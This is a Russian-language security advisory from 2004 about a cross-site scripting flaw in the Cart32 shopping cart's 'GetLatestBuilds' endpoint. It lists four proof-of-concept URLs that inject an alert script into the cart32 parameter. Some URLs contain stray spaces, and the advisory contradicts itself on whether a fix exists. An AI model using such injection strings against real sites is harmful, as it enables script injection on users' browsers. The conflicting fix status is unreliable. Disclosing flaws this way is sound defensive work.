Security Lab

Межсайтовый скриптинг в Cart32

Дата публикации:29.06.2004
Всего просмотров:1656
Опасность:
Низкая
Наличие исправления: Да
Количество уязвимостей:1
CVE ID: Нет данных
Вектор эксплуатации: Удаленная
Воздействие: Межсайтовый скриптинг
CWE ID: Нет данных
Наличие эксплоита: Нет данных
Уязвимые продукты: Cart32 Shopping Cart 5.x
Cart32 Shopping Cart 4.x
Уязвимые версии: Cart32

Описание: Уязвимость в Cart32 в 'GetLatestBuilds' позволяет удаленному пользователю выполнить XSS нападение.

Пример/Эксплоит:

http://vulnerable/scripts/cart32.exe/GetLatestBuilds?cart32=<script>al ert('XSS')</script>
http://vulnerable/scripts/c32web.exe/GetLatestBuilds?cart32=<script>alert('XSS')</script>
http://vulnerable/cgi-bin/cart32.exe/GetLatestBuilds?cart3 2=<script>alert('XSS')</script>
http://vulnerable/cgi-bin/c32web.exe/GetLatestBuilds?cart32=<script>alert('XSS')</script>

URL производителя: http://www.cart32.com/products.asp

Решение:Способов устранения обнаруженной уязвимости не существует в настоящее время.

Ссылки: Multiple vulnerabilities PowerPortal